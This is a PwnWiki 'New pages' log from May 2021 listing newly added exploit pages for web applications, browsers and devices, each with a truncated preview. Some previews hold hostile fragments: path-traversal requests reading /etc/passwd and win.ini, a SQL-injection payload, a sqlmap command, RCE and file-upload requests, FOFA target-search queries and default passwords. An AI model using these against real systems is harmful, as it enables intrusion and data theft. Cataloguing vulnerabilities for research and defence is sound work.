New pages

(newest | oldest) View (newer 50 | older 50) (20 | 50 | 100 | 250 | 500)

18:26, 17 May 2021 ‎Simple Chatbot Application 1.0 - 'Category' XSS漏洞 (hist | edit) ‎[1,175 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: Simple Chatbot Application 1.0 - 'Category' Stored Cross site Scripting # Date: 16-05-2021 # Exploit Author: Vani K G # Vendor Homepage: https:/...")
18:25, 17 May 2021 ‎Advanced Guestbook 2.4.4 - 'Smilies' XSS漏洞 (hist | edit) ‎[2,268 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: Advanced Guestbook 2.4.4 - 'Smilies' Persistent Cross-Site Scripting (XSS) # Date: 17/08/2021 # Exploit Author: Abdulkadir AYDOGAN # Vendor Home...")
18:24, 17 May 2021 ‎CVE-2018-19422 Subrion CMS 4.2.1 任意文件上傳&RCE漏洞 (hist | edit) ‎[5,832 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated) # Date: 17/05/2021 # Exploit Author: Fellipe Oliveira # Vendor Homepage: https://s...")
18:23, 17 May 2021 ‎Printable Staff ID Card Creator System 1.0 SQLi&RCE&任意文件上傳漏洞 (hist | edit) ‎[2,412 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Printable Staff ID Card Creator System 1.0 - SQLi & RCE via Arbitrary File Upload # Date: 2021-05-16 # Exploit Author : bwnz # Software Link: ht...")
18:22, 17 May 2021 ‎Dental Clinic Appointment Reservation System 1.0 - 'Firstname' XSS漏洞 (hist | edit) ‎[1,242 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Dental Clinic Appointment Reservation System 1.0 - 'Firstname' Persistent Cross Site Scripting (Authenticated) # Date: 14-05-2021 # Exploit Auth...")
18:20, 17 May 2021 ‎Dental Clinic Appointment Reservation System 1.0 CSRF管理員帳號添加漏洞 (hist | edit) ‎[930 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==CSRF== <pre> # Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Cross Site Request Forgery (Add Admin) # Date: 15-05-2021 # Exploit Author: Reza Afsahi # Ve...")
18:19, 17 May 2021 ‎CVE-2013-3893 Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free (hist | edit) ‎[9,061 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free # Date: 15/05/2021 # CVE : CVE-2013-3893 # PoC: https://github.com/travelworld...")
18:18, 17 May 2021 ‎IPFire 2.25 遠程代碼執行漏洞 (hist | edit) ‎[1,449 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: IPFire 2.25 - Remote Code Execution (Authenticated) # Date: 15/05/2021 # Exploit Author: Mücahit Saratar # Vendor Homepage: https://www.ipfire....")
18:17, 17 May 2021 ‎Customer Relationship Management (CRM) System 1.0 - 'Category' XSS漏洞 (hist | edit) ‎[1,226 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: Customer Relationship Management (CRM) System 1.0 - 'Category' Persistent Cross site Scripting # Date: 14-05-2021 # Exploit Author: Vani K G # V...")
09:50, 17 May 2021 ‎Ivanti Avalanche 目录遍歷&任意文件讀取漏洞 (hist | edit) ‎[297 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==影響範圍== Avalanche Premise 6.3.2 for Windows v6.3.2.3490 ==漏洞利用== 訪問 <pre> https://IP:8443/AvalancheWeb/image?imageFilePath=C:/Program Files/Microsoft SQL...")
09:44, 17 May 2021 ‎彩虹外鏈網盤 v4.0 任意文件讀取漏洞 (hist | edit) ‎[587 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> import requests import re import sys url = sys.argv[1] file = sys.argv[2] headers={"X-Forwarded-For":"127.0.0.1"} requests = requests.session() html = requests.g...")
09:41, 17 May 2021 ‎藍天採集器 v2.3.1 後台getshell漏洞 (hist | edit) ‎[856 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞利用== 訪問 <pre> http://www.0-sec.org/index.php?s=/Admin/Store/installPlugin </pre> 添加http頭Origin: <pre> http://www.0-sec.org </pre> POST: <pre> plugin=ey...")
09:37, 17 May 2021 ‎CVE-2020-13151 Aerospike 數據庫主機命令執行漏洞 (hist | edit) ‎[6,289 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞影響== Aerospike 社區版 \<5.1.0.3 ==POC== <pre> #!/usr/bin/env python3 import argparse import random import os, sys from time import sleep import string # requi...")
09:35, 17 May 2021 ‎TG8 Firewall RCE&信息洩露漏洞 (hist | edit) ‎[742 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==Payload== <pre> POST /admin/runphpcmd.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: applica...")
09:33, 17 May 2021 ‎TVT數碼科技 NVMS-1000 路徑遍歷漏洞 (hist | edit) ‎[579 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> app="TVT-NVMS-1000" </pre> ==Request== <pre> GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 Host: Cache-Control: max-age=0 Upgrade-Insecure...")
09:30, 17 May 2021 ‎遠秋醫學技能考試系統 SQL注入漏洞 (hist | edit) ‎[498 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> 远秋医学技能考试系统 </pre> ==注入點== <pre> http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1 </pre> ==SQLMAP== <pre> sqlmap -u "http://x...")
09:28, 17 May 2021 ‎SmartBi 全版本SQl注入&任意文件上傳漏洞 (hist | edit) ‎[736 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==Payload== <pre> http://www.xxx.com//vision/FileResource?op=OPEN&resId=LOGIN_BG_IMG </pre> ==任意文件上傳== <pre> POST /vision/designer/imageimport.jsp HTTP/1.1 Host:...")
10:24, 16 May 2021 ‎獅子魚CMS wxapp.php 任意文件上傳漏洞 (hist | edit) ‎[866 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> "/seller.php?s=/Public/login" </pre> ==Request== <pre> POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1 Host: Content-Length: 210 Cache-Control: max-age...")
10:22, 16 May 2021 ‎獅子魚CMS image upload.php 任意文件上傳漏洞 (hist | edit) ‎[548 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> "/seller.php?s=/Public/login" </pre> ==Request== <pre> POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/2 Host: 47.95.36.147 Content-Type:...")
10:20, 16 May 2021 ‎獅子魚CMS ApigoodsController.class.php SQL注入漏洞 (hist | edit) ‎[866 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> "/seller.php?s=/Public/login" </pre> ==Request== <pre> POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1 Host: Content-Length: 210 Cache-Control: max-age...")
10:19, 16 May 2021 ‎獅子魚CMS ApiController.class.php SQL注入漏洞 (hist | edit) ‎[188 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> "/seller.php?s=/Public/login" </pre> ==Payload== <pre> https://xxx.xxx.xx.xxx/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x...")
13:05, 15 May 2021 ‎CVE-2021-21156&CVE-2021-21148 Chrome Array Transfer 繞過漏洞 (hist | edit) ‎[324 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==INFO== <pre> The fix for CVE-2021-21148 has added a check in |ValueSerializer::WriteJSArrayBuffer| to make sure non-detachable array buffers cannot be transferred. The check...")
08:46, 15 May 2021 ‎CVE-2021-31933 Chamilo LMS 1.11.14 遠程代碼執行漏洞 (hist | edit) ‎[2,789 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated) # Date: 13/05/2021 # Exploit Author: M. Cory Billington (@_th3y) # Vendor Homepage:...")
08:45, 15 May 2021 ‎Podcast Generator 3.1 - 'Long Description' Persistent XSS漏洞 (hist | edit) ‎[3,575 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS) # Date: 13/05/2021 # Exploit Author: Ayşenur KARAASLAN # Vendo...")
08:43, 15 May 2021 ‎Student Management System 1.0 - 'message' Persistent XSS漏洞 (hist | edit) ‎[1,018 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: Student Management System 1.0 - 'message' Persistent Cross-Site Scripting (Authenticated) # Date: 2021-05-13 # Exploit Author: mohsen khashei (k...")
09:55, 14 May 2021 ‎CVE-2021-26828 ScadaBR 1.0 / 1.1CE Windows Shell 上傳漏洞 (hist | edit) ‎[6,777 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> #!/usr/bin/python # Exploit Title: Authenticated Arbitrary File Upload (Remote Code Execution) # Google Dork: N/A # Date: 03/2021 # Exploit Author: Fellipe Oliv...")
09:54, 14 May 2021 ‎CVE-2021-26419 Internet Explorer jscript9.dll 內存損壞漏洞 (hist | edit) ‎[7,023 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> Internet Explorer: Memory corruption in jscript9.dll related to scope of the arguments object There is a vulnerability in jscript9 that could be potentially use...")
09:42, 14 May 2021 ‎藍凌OA SSRF+JNDI遠程命令執行漏洞 (hist | edit) ‎[1,948 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞描述== 深圳市藍凌軟件股份有限公司數字OA(EKP)存在任意文件讀取漏洞。攻擊者可利用漏洞獲取敏感信息，讀取配置文件得到密...")
09:38, 14 May 2021 ‎藍海卓越計費管理系統 download.php 任意文件讀取漏洞 (hist | edit) ‎[650 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> title=="蓝海卓越计费管理系统" </pre> ==Request== <pre> GET /download.php?file=../../../../../etc/passwd HTTP/1.1 Host: Cache-Control: max-age=0 Upgr...")
09:35, 14 May 2021 ‎泛微E-Cology WorkflowServiceXml RCE漏洞 (hist | edit) ‎[39,109 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞影響== E-cology <= 9.0 ==FOFA== <pre> app="泛微-协同办公OA" </pre> ==POC== <pre> #!/usr/bin/python3 #-*- coding:utf-8 -*- # author : PeiQi # from : http://...")
17:30, 13 May 2021 ‎CVE-2020-0674 Microsoft Internet Explorer 8/11 and WPAD service 'Jscript.dll' Use-After-Free (hist | edit) ‎[54,564 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Microsoft Internet Explorer 8/11 and WPAD service 'Jscript.dll' - Use-After-Free # Date: 2021-05-04 # Exploit Author: deadlock (Forrest Orr) # V...")
17:29, 13 May 2021 ‎CVE-2019-17026 Firefox 72 IonMonkey JIT類型混淆漏洞 (hist | edit) ‎[43,733 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Firefox 72 IonMonkey - JIT Type Confusion # Date: 2021-05-10 # Exploit Author: deadlock (Forrest Orr) # Vendor Homepage: https://www.mozilla.org...")
17:27, 13 May 2021 ‎CVE-2019-12725 ZeroShell 3.9.0 遠程命令執行漏洞 (hist | edit) ‎[2,380 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: ZeroShell 3.9.0 - Remote Command Execution # Date: 10/05/2021 # Exploit Author: Fellipe Oliveira # Vendor Homepage: https://zeroshell.org/ # So...")
17:26, 13 May 2021 ‎Dental Clinic Appointment Reservation System 1.0 - 'date' UNION based SQL注入漏洞 (hist | edit) ‎[1,529 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Dental Clinic Appointment Reservation System 1.0 - 'date' UNION based SQL Injection (Authenticated) # Date: 12.05.2021 # Exploit Author: Mesut C...")
17:24, 13 May 2021 ‎Dental Clinic Appointment Reservation System 1.0 身份驗證繞過漏洞 (hist | edit) ‎[1,519 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass (SQLi) # Date: 12.05.2021 # Exploit Author: Mesut Cetin # Vendor Homepa...")
08:49, 13 May 2021 ‎Splinterware System Scheduler Professional 5.30 特權提升漏洞 (hist | edit) ‎[2,573 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Splinterware System Scheduler Professional 5.30 - Privilege Escalation # Date: 2021-05-11 # Exploit Author: Andrea Intilangelo # Vendor Homepage...")
18:33, 12 May 2021 ‎Hehome (hist | edit) ‎[6,496 bytes] ‎Pwnwiki (talk | contribs) (Created page with "{{DISPLAYTITLE:<span style="position: absolute; clip: rect(1px 1px 1px 1px); clip: rect(1px, 1px, 1px, 1px);">{{FULLPAGENAME}}</span>}} {{Template:Banner0-Hebrew}} {{Template:...")
17:03, 12 May 2021 ‎ERPNext versions 12.18.0 and 13.0.0 SQL注入漏洞 (hist | edit) ‎[4,537 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Trovent Security Advisory 2103-01 # ##################################### Authenticated SQL injection in ERPNext 13.0.0/12.18.0 #############################...")
17:02, 12 May 2021 ‎SIS-REWE GO version 7.5.0 and 12C XSS漏洞 (hist | edit) ‎[5,431 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> SEC Consult Vulnerability Lab Security Advisory < 20210511-0 > ======================================================================= title: Refl...")
17:02, 12 May 2021 ‎ERPNext versions 12.18.0 and 13.0.0 XSS漏洞 (hist | edit) ‎[7,084 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Trovent Security Advisory 2103-02 # ##################################### Multiple XSS vulnerabilities in ERPNext 13.0.0/12.18.0 ############################...")
17:01, 12 May 2021 ‎CVE-2020-20220&CVE-2020-20227&CVE-2020-20245&CVE-2020-20246 MikroTik RouterOS 內存損壞漏洞 (hist | edit) ‎[9,762 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==INFO== <pre> Advisory: four vulnerabilities found in MikroTik's RouterOS Details ======= Product: MikroTik's RouterOS Vendor URL: https://mikrotik.com/ Vendor Status: onl...")
16:59, 12 May 2021 ‎CVE-2021-32051 Hexagon G!nius Auskunftsportal SQL 注入漏洞 (hist | edit) ‎[2,919 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==INFO== <pre> CVE-2021-32051 Hexagon G!nius Auskunftsportal before 5.0.0.0 allows SQL injection via the GiPWorkflow/Service/DownloadPublicFile id parameter. [Additional Info...")
16:57, 12 May 2021 ‎Customer Relationship Management (CRM) System 1.0 SQL注入漏洞 (hist | edit) ‎[1,127 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Customer Relationship Management (CRM) System 1.0 - Admin Bypass (SQLi) # Date: 11/05/2021 # Exploit Author: Richard Jones # Vendor Homepage: h...")
16:57, 12 May 2021 ‎Customer Relationship Management (CRM) System 1.0 XSS漏洞 (hist | edit) ‎[1,231 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: Customer Relationship Management (CRM) System 1.0 - Stored XSS # Date: 11/05/2021 # Exploit Author: Richard Jones # Vendor Homepage: https://www...")
16:55, 12 May 2021 ‎Customer Relationship Management (CRM) System 1.0 遠程Shell上傳漏洞 (hist | edit) ‎[1,888 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Customer Relationship Management (CRM) Unrestricted File Upload (unauthenticated) # Date: 11/05/2021 # Exploit Author: Richard Jones # Vendor Ho...")
16:49, 12 May 2021 ‎Chevereto 3.17.1 XSS漏洞 (hist | edit) ‎[594 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: Chevereto 3.17.1 - Cross Site Scripting (Stored) # Google Dork: "powered by chevereto" # Date: 19.04.2021 # Exploit Author: Akıner Kısa # Vend...")
09:07, 12 May 2021 ‎CVE-2017-9841 PHPUnit eval-stdin.php 遠程命令執行漏洞 (hist | edit) ‎[245 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞影響== PHPUnit < 5.6.3 ==漏洞利用== 發送以下數據包執行PHP代碼: <pre> POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: Conten...")
09:04, 12 May 2021 ‎菲力爾 FLIR-AX8 download.php 任意文件下載漏洞 (hist | edit) ‎[103 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> app="FLIR-FLIR-AX8" </pre> ==漏洞利用== <pre> /download.php?file=/etc/passwd </pre>")
09:01, 12 May 2021 ‎碧海威 L7多款產品後台命令執行漏洞 (hist | edit) ‎[291 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> "碧海威" </pre> ==漏洞利用== 默認密碼為 adimn/admin or admin123 漏洞存在於命令控制台中，其中存在命令注入系統中默認有...")
08:56, 12 May 2021 ‎Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path (hist | edit) ‎[1,577 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path # Exploit Author: 1F98D # Vendor Homepage: https://www.odoo.com/ # Software Link: https:/...")

(newest | oldest) View (newer 50 | older 50) (20 | 50 | 100 | 250 | 500)

Anonymous

Search

New pages

Namespaces

More

Page actions

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

New pages

Navigation

Wiki tools

Page tools